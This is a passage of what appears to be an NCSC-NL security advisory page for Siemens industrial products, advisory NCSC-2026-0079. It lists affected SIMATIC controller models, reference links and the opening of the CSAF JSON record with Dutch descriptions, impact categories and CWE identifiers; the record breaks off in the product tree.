vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
| URL | Category |
|---|---|
| https://cert-portal.siemens.com/productcert/html/… | external |
| https://cert-portal.siemens.com/productcert/html/… | external |
| https://cert-portal.siemens.com/productcert/html/… | external |
| https://cert-portal.siemens.com/productcert/html/… | external |
| https://cert-portal.siemens.com/productcert/html/… | external |
| https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
{
"document": {
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "nl",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:\n\n NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.\n\n NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.\n This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
},
{
"category": "description",
"text": "Siemens heeft kwetsbaarheden verholpen in diverse producten als Heliox, Ruggedcom, SICAM, SIDIS en SIMATIC.",
"title": "Feiten"
},
{
"category": "description",
"text": "De kwetsbaarheden stellen een kwaadwillende mogelijk in staat aanvallen uit te voeren die kunnen leiden tot de volgende categorie\u00ebn schade:\n\n- Denial-of-Service (DoS)\n- Manipulatie van gegevens\n- Omzeilen van een beveiligingsmaatregel\n- (Remote) code execution (root/admin rechten)\n- Toegang tot systeemgegevens\n- Verhogen van rechten\n\nVoor succesvol misbruik van de genoemde kwetsbaarheden moet de kwaadwillende toegang hebben tot de productie-omgeving. Het is goed gebruik een dergelijke omgeving niet publiek toegankelijk te hebben.",
"title": "Interpretaties"
},
{
"category": "description",
"text": "Siemens heeft beveiligingsupdates uitgebracht om de kwetsbaarheden te verhelpen. Voor de kwetsbaarheden waar nog geen updates voor zijn, heeft Siemens mitigerende maatregelen gepubliceerd om de risico\u0027s zoveel als mogelijk te beperken. Zie de bijgevoegde referenties voor meer informatie.",
"title": "Oplossingen"
},
{
"category": "general",
"text": "medium",
"title": "Kans"
},
{
"category": "general",
"text": "high",
"title": "Schade"
},
{
"category": "general",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "general",
"text": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"title": "CWE-22"
},
{
"category": "general",
"text": "Relative Path Traversal",
"title": "CWE-23"
},
{
"category": "general",
"text": "External Control of File Name or Path",
"title": "CWE-73"
},
{
"category": "general",
"text": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"title": "CWE-78"
},
{
"category": "general",
"text": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"title": "CWE-79"
},
{
"category": "general",
"text": "Stack-based Buffer Overflow",
"title": "CWE-121"
},
{
"category": "general",
"text": "Out-of-bounds Read",
"title": "CWE-125"
},
{
"category": "general",
"text": "Improper Handling of Length Parameter Inconsistency",
"title": "CWE-130"
},
{
"category": "general",
"text": "Use of Externally-Controlled Format String",
"title": "CWE-134"
},
{
"category": "general",
"text": "Incorrect Behavior Order: Early Validation",
"title": "CWE-179"
},
{
"category": "general",
"text": "Incomplete List of Disallowed Inputs",
"title": "CWE-184"
},
{
"category": "general",
"text": "Integer Overflow or Wraparound",
"title": "CWE-190"
},
{
"category": "general",
"text": "Numeric Truncation Error",
"title": "CWE-197"
},
{
"category": "general",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
},
{
"category": "general",
"text": "Insertion of Sensitive Information Into Sent Data",
"title": "CWE-201"
},
{
"category": "general",
"text": "Observable Discrepancy",
"title": "CWE-203"
},
{
"category": "general",
"text": "Observable Timing Discrepancy",
"title": "CWE-208"
},
{
"category": "general",
"text": "Improper Access Control",
"title": "CWE-284"
},
{
"category": "general",
"text": "Authentication Bypass Using an Alternate Path or Channel",
"title": "CWE-288"
},
{
"category": "general",
"text": "Improper Certificate Validation",
"title": "CWE-295"
},
{
"category": "general",
"text": "Use of Insufficiently Random Values",
"title": "CWE-330"
},
{
"category": "general",
"text": "Exposure of Private Personal Information to an Unauthorized Actor",
"title": "CWE-359"
},
{
"category": "general",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "general",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "general",
"text": "Interpretation Conflict",
"title": "CWE-436"
},
{
"category": "general",
"text": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"title": "CWE-444"
},
{
"category": "general",
"text": "Uncontrolled Recursion",
"title": "CWE-674"
},
{
"category": "general",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "general",
"text": "Out-of-bounds Write",
"title": "CWE-787"
},
{
"category": "general",
"text": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
"title": "CWE-835"
},
{
"category": "general",
"text": "Improper Restriction of Communication Channel to Intended Endpoints",
"title": "CWE-923"
},
{
"category": "general",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "general",
"text": "Improper Verification of Source of a Communication Channel",
"title": "CWE-940"
},
{
"category": "general",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "general",
"text": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
"title": "CWE-1321"
},
{
"category": "general",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "Nationaal Cyber Security Centrum",
"namespace": "https://www.ncsc.nl/"
},
"references": [
{
"category": "external",
"summary": "Reference",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-126399.html"
},
{
"category": "external",
"summary": "Reference",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-452276.html"
},
{
"category": "external",
"summary": "Reference",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-485750.html"
},
{
"category": "external",
"summary": "Reference",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-903736.html"
},
{
"category": "external",
"summary": "Reference",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-975644.html"
}
],
"title": "Kwetsbaarheden verholpen in Siemens producten",
"tracking": {
"current_release_date": "2026-03-10T12:39:14.474522Z",
"generator": {
"date": "2025-08-04T16:30:00Z",
"engine": {
"name": "V.A.",
"version": "1.3"
}
},
"id": "NCSC-2026-0079",
"initial_release_date": "2026-03-10T12:39:14.474522Z",
"revision_history": [
{
"date": "2026-03-10T12:39:14.474522Z",
"number": "1.0.0",
"summary": "Initiele versie"
}
],
"status": "final",
"version": "1.0.0"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-1"
}
}
],
"category": "product_name",
"name": "Heliox Flex 180 kW EV Charging Station"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-2"
}
}
],
"category": "product_name",
"name": "Heliox Mobile DC 40 kW EV Charging Station"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-3"
}
}
],
"category": "product_name",
"name": "RUGGEDCOM APE1808"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-4"
}
}
],
"category": "product_name",
"name": "SICAM SIAPP SDK"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-5"
}
}
],
"category": "product_name",
"name": "SIDIS Prime"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-6"
}
}
],
"category": "product_name",
"name": "SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-7"
}
}
],
"category": "product_name",
"name": "SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-8"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-9"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-10"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-11"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-12"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-13"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-14"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-15"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-16"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-17"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-18"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-19"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-20"
}
}
],
"category": "product_name",
"name": "SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)"
},
{
"branches": [
{
"category": "product_version_range",
